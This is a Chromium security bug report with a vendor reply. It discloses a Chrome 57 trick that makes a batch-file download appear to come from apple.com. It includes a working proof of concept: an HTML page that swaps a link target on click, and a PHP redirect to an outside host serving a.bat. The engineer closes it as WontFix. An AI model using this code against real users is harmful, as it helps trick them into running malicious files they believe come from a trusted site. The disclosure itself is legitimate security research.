New issue
Advanced search Search tips

Issue 707574 link

Starred by 1 user
Status: WontFix
Owner: ----
Closed: Apr 2017
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: We can make download dialog appear on arbitrary websites

Reported by greencar...@hotmail.com, Apr 2 2017 

VULNERABILITY DETAILS


Using some tricks, we can make it seem like a legitimate (and trusted) website is initiating a download under our control. This can lead to fooling a user into executing an application under the assumption its from a trusted website.


Once hosted, simply visit Faker.html and click the anchor tag. You should see the magic happen.

Thank you

VERSION
Chrome Version: 57.0.2987.133 (64-bit)
Operating System: Windows 10

REPRODUCTION CASE
Two files are needed:

Faker.html:
---------------------------------------------------------------
<a href='http://www.apple.com/itunes/download/' download='itunes.bat' id="qa">Click here</a>
<script>
qa.onmousedown=function(){
	qa.href='sleeper.php';
};

qa.onclick=function(){
open('http://www.apple.com/itunes/download/thank-you/','_self');
}
</script>
------------------------------------------------------------

sleeper.php:
----------------------------------------------------------
<?php
sleep(3);
header('Location: http://leucosite.com/a.bat')
?>
-----------------------------------------------------------

Comment 1 by dominickn@chromium.org, Apr 3 2017

Status: WontFix (was: Unconfirmed)
Thanks for the report. For completeness, this is what happens:

1. load faker.html and click on the download link
2. the apple.com thank you page starts loading
3. after a few seconds the a.bat file starts downloading

Ultimately, our protection for this sort of attack is Safe Browsing scanning the downloaded files and the sites offering them. Aside from that, I think there would be legitimate uses of this combination, meaning it's difficult to say it's not allowed.

Finally, this attack supposes that the user trusts faker.html as a source for a download (they have to click the download link before they get redirected to a "trusted" post-download page). That means that this doesn't work unless there's some sort of phishing or other scheme which has brought in their trust. Importantly, chrome://downloads also tells you the exact location where the file was downloaded from.

I'm closing this as WontFix since it's not directly a security exploit on its own.
Project Member

Comment 2 by sheriffbot@chromium.org, Jul 10 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment